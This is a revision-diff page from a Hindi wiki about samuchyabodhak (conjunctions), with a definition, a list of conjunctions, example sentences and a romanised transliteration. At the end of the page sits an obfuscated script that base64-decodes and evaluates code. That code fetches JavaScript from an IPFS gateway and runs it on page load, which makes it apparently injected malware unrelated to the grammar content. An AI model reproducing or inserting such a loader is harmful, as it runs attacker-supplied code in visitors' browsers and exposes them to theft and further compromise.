Difference between revisions of "समुच्यबोधक"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना; Adding category Category:हिन्दी भाषा (को हटा दिया गया हैं।))
Line 1: Line 1:
 
*समुच्यबोधक [[सार्थक शब्द (व्याकरण)|सार्थक शब्दों]] के आठ भेदों में एक भेद है।
 
*समुच्यबोधक [[सार्थक शब्द (व्याकरण)|सार्थक शब्दों]] के आठ भेदों में एक भेद है।
 
*[[व्याकरण (व्यावहारिक)|व्याकरण]] में समुच्यबोधक एक [[अविकारी शब्द]] है।  
 
*[[व्याकरण (व्यावहारिक)|व्याकरण]] में समुच्यबोधक एक [[अविकारी शब्द]] है।  
*जो अविकारी [[शब्द (व्याकरण)|शब्द]] दो शब्दों, दो वाक्यों अथवा दो वाक्यों खण्डों को जोड़ते हैं, उन्हें समुच्यबोधक कहते हैं।  
+
*जो अविकारी [[शब्द (व्याकरण)|शब्द]] दो शब्दों, दो वाक्यों अथवा दो वाक्य खण्डों को जोड़ते हैं, उन्हें समुच्यबोधक कहते हैं।  
*जैसे- और, या, न, पर, किन्तु, परन्तु, वरन्, लेकिन, इसीलिए, अतएव, सो, अत:, क्योंकि, कि, यदि, तो, यद्यपि-तथापि आदि। उदाहरण-
+
*जैसे- और, या, न, पर, किन्तु, परन्तु, वरन्, लेकिन, इसीलिए, अतएव, सो, अत:, क्योंकि, कि, यदि, तो, यद्यपि-तथापि आदि।  
 +
;<u>उदाहरण</u>
 
*राम और श्याम [[दिल्ली]] जा रहे हैं।
 
*राम और श्याम [[दिल्ली]] जा रहे हैं।
 
*या तो तुम बातें करों या सो जाओ।
 
*या तो तुम बातें करों या सो जाओ।

Revision as of 08:15, 5 January 2011

  • samuchyabodhak sarthak shabdoan ke ath bhedoan mean ek bhed hai.
  • vyakaran mean samuchyabodhak ek avikari shabd hai.
  • jo avikari shabd do shabdoan, do vakyoan athava do vaky khandoan ko jo date haian, unhean samuchyabodhak kahate haian.
  • jaise- aur, ya, n, par, kintu, parantu, varanh, lekin, isilie, atev, so, at:, kyoanki, ki, yadi, to, yadyapi-tathapi adi.
udaharan
  • ram aur shyam dilli ja rahe haian.
  • ya to tum batean karoan ya so jao.
  • vah yahaan avashy ata, parantu bimar tha.
  • yadi tum aoge, to maian bhi avashy aooanga.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>